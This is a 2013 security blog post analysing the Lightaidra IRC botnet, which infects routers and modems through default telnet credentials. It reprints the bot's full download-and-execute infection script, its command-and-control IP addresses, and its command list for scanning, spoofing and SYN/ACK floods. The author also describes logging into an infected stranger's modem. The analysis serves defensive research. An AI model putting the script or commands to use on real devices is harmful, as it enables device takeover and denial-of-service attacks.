Monday, August 19, 2013

Lightaidra - Embedded Linux Device Botnet

I was checking some logs and found an IP attempting to connect to telnet (port 23) on one of my servers. Usually when you see this kind of stuff in the logs it is just a scanner or someone running nmap to look around. This time I find an active bot scanning and building a botnet.

The Lightaidra DDoS malware was developed in 2012 but appears to be still doing quite well in the wild. Mainly because this bot relies on the fact that many consumer network devices that this bot targets use the default username and password, something like admin/admin or root/admin. There are other resources and blogs that give more details about this particular strain. I have included some links at the bottom.

Lightaidra - is an open source embedded linux device bot and is described by its creator, Federico Fazzi, as an "IRC-based mass router scanner/exploiter". What this means is that instead of it infecting PCs, this bot runs on devices like cable and DSL modems.

The operation of this bot is straightforward and requires two servers to manage the entire botnet. One server that will host the various binaries used for infection and an IRC server to control the botnet actions.

The first thing the bot does when it connects to a new modem is run "getbinaries.sh" - Note that Lightaidra requires linux to be running on the device.
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://127.0.0.1"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
As you can see, all this script does is download the binaries for each CPU architecture the bot supports, MIPSEL, MIPS, ARM, SuperH (it can also be compiled as 32 and 64bit linux binary).  The bot does not "check" the architecture first and download the correct binary. It just downloads and runs them all, and whichever binary executes is on the correct architecture. Thats not lazy at all.

After the binary is downloaded and executed from the http server, it connects back to the IRC command and control server and awaits further instructions.

Lightaidra's primary features are scanning for other routers/modems to infect and (DDoS) Distributed Denial of Service attacks. The bot can also execute commands on the system it is installed.



So here is how I found it. I telnet back to the IP I found in my logs..


No password for root. Face-palm. 
Looks like I was connected to a DSL modem. Most consumer modems and routers only use default credentials like "admin/admin" or "root/admin", which is why Lightaidra is able to target and exploit these devices easily.  

ps output 
This is an indicator of Lightaidra infection - the default path is /var/run
Note this is a device with ARM CPU architecture. 



Look inside the default Lightaidra directory /var/run and you will see the downloaded binaries and the logfiles .lightpid and .lightscan
the file .lightscan is a list of IP addresses that have been found and respond to telnet. 



Command & Control servers I found inside the ARM and SH binaries.
178.79.183.247
192.79.153.207


The binary reveals the C&C in plain text.




This C&C has also been spotted by other researchers at Inside Your Botnet.


* Looking up 178.79.183.247
* Connecting to 178.79.183.247 (178.79.183.247) port 11112...
* Connected. Now logging in...
* Welcome to the Internet Relay Network @localhost.it
* Your host is irc.pollo.org, running version ngircd-19.2 (x86_64/pc/linux-gnu)
* This server has been started Sun Jun 30 2013 at 16:13:07 (UTC)
* irc.pollo.org ngircd-19.2 acCiorRswx beiIklmnoOPrRstvz
* RFC2812 IRCD=ngIRCd CASEMAPPING=ascii PREFIX=(ov)@+ CHANTYPES=#&+ CHANMODES=beI,k,l,imnOPRstz CHANLIMIT=#&+:2 :are supported on this server
* CHANNELLEN=50 NICKLEN=20 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
* There are 804 users and 0 services on 1 servers
* 1 :channels formed
* I have 804 users, 0 services and 0 servers
* 804 1014 :Current local users: 804, Max: 1014
* 804 1014 :Current global users: 804, Max: 1014
* Highest connection count: 1014 (170926 connections received)



Lightaidra Commands:
Lightaidra's primary features are scanning for other routers/modems to infect and (DDoS) Distributed Denial of Service attacks. The bot can also execute commands on the system it is installed.

PRIVMSG %s :*
PRIVMSG %s :* .login                <password>        - login to bot's party-line
PRIVMSG %s :* .logout                                 - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
PRIVMSG %s :* *** EOF
 
Links about Lightaidra
http://vierko.org/tech/lightaidra-0x2012/

http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/

No comments:

Post a Comment